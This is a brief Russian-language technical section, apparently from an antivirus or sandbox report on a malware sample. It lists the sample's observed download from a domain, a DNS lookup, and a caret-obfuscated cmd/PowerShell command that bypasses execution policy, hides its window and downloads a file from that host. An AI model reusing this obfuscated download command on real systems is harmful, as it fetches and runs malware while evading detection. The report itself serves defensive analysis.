Техническая информация
- http://transporingsytw.wang/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "p^owER^sH^EL^l.^exe -^E^XE^c^UTION^po^Li^CY byPAS^s ^-n^Op^roFiL^E^ ^-^wInd^Ow^sT^Yl^e^ HIDDE^N^ (N^Ew-ObJEct Sys^Te^M.NEt.WE^bC^Lie^Nt).^d^OwNL^O^ad^fI^Le^(^'http://transpori...
- DNS ASK tr#####ringsytw.wang
- '<SYSTEM32>\cmd.exe' /C "p^owER^sH^EL^l.^exe -^E^XE^c^UTION^po^Li^CY byPAS^s ^-n^Op^roFiL^E^ ^-^wInd^Ow^sT^Yl^e^ HIDDE^N^ (N^Ew-ObJEct Sys^Te^M.NEt.WE^bC^Lie^Nt).^d^OwNL^O^ad^fI^Le^(^'http://transpori...' (со скрытым окном)